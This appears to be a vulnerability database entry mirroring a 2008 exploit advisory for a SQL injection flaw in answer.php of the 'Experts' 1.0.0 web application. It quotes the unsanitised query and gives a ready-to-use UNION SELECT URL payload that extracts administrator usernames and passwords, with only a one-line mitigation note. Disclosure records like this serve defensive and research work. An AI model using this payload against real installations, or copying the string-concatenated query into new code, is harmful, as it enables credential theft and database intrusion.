Experts (answer.php) Remote SQL Injection Vulnerability

vendor:

Experts

by:

CWH Underground

CVSS

HIGH

SQL Injection

CWE

Product Name: Experts

Affected Version From: 1.0.0

Affected Version To: 1.0.0

Patch Exists: No

Related CWE: N/A

CPE: a:experts:experts:1.0.0

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

Experts (answer.php) Remote SQL Injection Vulnerability

Experts (answer.php) Remote SQL Injection Vulnerability is a vulnerability that allows an attacker to inject malicious SQL statements into an application's code. This vulnerability can be exploited by sending a specially crafted HTTP request to the vulnerable application. The malicious SQL statement can be used to bypass authentication, access, modify and delete data in the back-end database.

Mitigation:

To mitigate this vulnerability, input validation should be performed on all user-supplied data. All user-supplied data should be treated as untrusted and should be validated before being used in any SQL statement.

Source

Exploit-DB raw data:

=========================================================
 Experts (answer.php) Remote SQL Injection Vulnerability
=========================================================

  ,--^----------,--------,-----,-------^--,
  | |||||||||   `--------'     |          O	.. CWH Underground Hacking Team ..
  `+---------------------------^----------|
    `\_,-------, _________________________|
      / XXXXXX /`|     /
     / XXXXXX /  `\   /
    / XXXXXX /\______(
   / XXXXXX /           
  / XXXXXX /
 (________(             
  `------'

AUTHOR : CWH Underground
DATE   : 10 June 2008
SITE   : www.citec.us


#####################################################
 APPLICATION : Experts
 VERSION     : 1.0.0
 DOWNLOAD    : http://downloads.sourceforge.net/experts
#####################################################

---SQL Injection Exploit---

***magic_quotes_gpc = off***

##################################################################################
Line:
   67:	$con= "SELECT question_text, question_expert, question_category, question_closed,  
   68:	TIME_TO_SEC(TIMEDIFF(NOW(),question_date)) AS seconds_ago, 
   69:	user_login, user_id, category_name, expert_login   
   70:	FROM question 
   71:	INNER JOIN (user,category, expert) 
   72:	ON (question_user=user_id 
   73:	AND question_category=category_id AND question_expert=expert_id ) 
   74:	WHERE question_id=".$question_id;
   75:	//echo $con."<br>";
   76:	$fai_con=mysql_query($con) or die(mysql_error());
##################################################################################

EXPLOIT:

http://[Target]/[experts_path]/answer.php?question_id=41 AND 1=2 UNION SELECT concat(administrator_login,0x3a,administrator_password),2,3,4,5,6,7,8,9 FROM administrator


##################################################################
# Greetz: ZeQ3uL, BAD $ectors, Snapter, Conan, JabAv0C, Win7dos  #
##################################################################

# milw0rm.com [2008-06-10]